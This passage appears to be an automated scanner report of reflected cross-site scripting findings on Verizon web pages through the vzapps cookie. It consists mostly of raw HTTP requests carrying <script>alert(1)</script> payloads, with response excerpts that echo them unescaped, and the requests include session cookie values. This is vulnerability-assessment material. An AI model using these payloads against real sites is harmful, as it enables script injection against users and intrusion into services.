Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX9fc75<script>alert(1)</script>7aa49d06f5e; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104004
Expires: Sat, 20 Nov 2010 02:13:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:13:39 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9fc75<script>alert(1)</script>7aa49d06f5e; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9FC75<SCRIPT>ALERT(1)</SCRIPT>7AA49D06F5E </DIV>
...[SNIP]...

1.107. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 69d84<script>alert(1)</script>aa3f79cc48 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX69d84<script>alert(1)</script>aa3f79cc48; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199722
Expires: Sat, 20 Nov 2010 04:35:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 04:35:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 04:35:51 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 04:35:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 04:35:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 04:35:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX69D84<SCRIPT>ALERT(1)</SCRIPT>AA3F79CC48 </DIV>
...[SNIP]...

1.108. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9001f'><script>alert(1)</script>4a248056d9d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX9001f'><script>alert(1)</script>4a248056d9d; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201238
Expires: Sat, 20 Nov 2010 04:35:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 04:35:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 04:35:36 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 04:35:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 04:35:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 04:35:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9001F'><SCRIPT>ALERT(1)</SCRIPT>4A248056D9D ' />
...[SNIP]...

1.109. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 51cbb<script>alert(1)</script>683445b1e19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX51cbb<script>alert(1)</script>683445b1e19; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201240
Expires: Sat, 20 Nov 2010 02:15:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:15:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:15:32 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:15:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:15:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:15:32 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX51CBB<SCRIPT>ALERT(1)</SCRIPT>683445B1E19 </DIV>
...[SNIP]...

1.110. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74af2'><script>alert(1)</script>d655b1e991a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX74af2'><script>alert(1)</script>d655b1e991a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201244
Expires: Sat, 20 Nov 2010 02:15:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:15:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:15:30 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:15:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:15:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:15:30 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX74AF2'><SCRIPT>ALERT(1)</SCRIPT>D655B1E991A ' />
...[SNIP]...

1.111. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3e7e1<script>alert(1)</script>a7984dcde2b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX3e7e1<script>alert(1)</script>a7984dcde2b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 308864
Expires: Sat, 20 Nov 2010 02:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:16:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX3e7e1<script>alert(1)</script>a7984dcde2b; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:16 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3E7E1<SCRIPT>ALERT(1)</SCRIPT>A7984DCDE2B </DIV>
...[SNIP]...

1.112. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d72f'><script>alert(1)</script>ed1c4719934 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX2d72f'><script>alert(1)</script>ed1c4719934; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 307358
Expires: Sat, 20 Nov 2010 02:16:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:16:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:16:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX2d72f'><script>alert(1)</script>ed1c4719934; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:08 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2D72F'><SCRIPT>ALERT(1)</SCRIPT>ED1C4719934 ' />
...[SNIP]...

1.113. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/FiOSDigitalVoice.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/FiOSDigitalVoice.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6614d'><script>alert(1)</script>00665d65475 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/FiOSDigitalVoice.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX6614d'><script>alert(1)</script>00665d65475; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201286
Expires: Sat, 20 Nov 2010 02:16:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:16:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:16:17 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:17 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6614D'><SCRIPT>ALERT(1)</SCRIPT>00665D65475 ' />
...[SNIP]...

1.114. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/FiOSDigitalVoice.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/FiOSDigitalVoice.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a71c4<script>alert(1)</script>f2b03f92e3a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/FiOSDigitalVoice.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
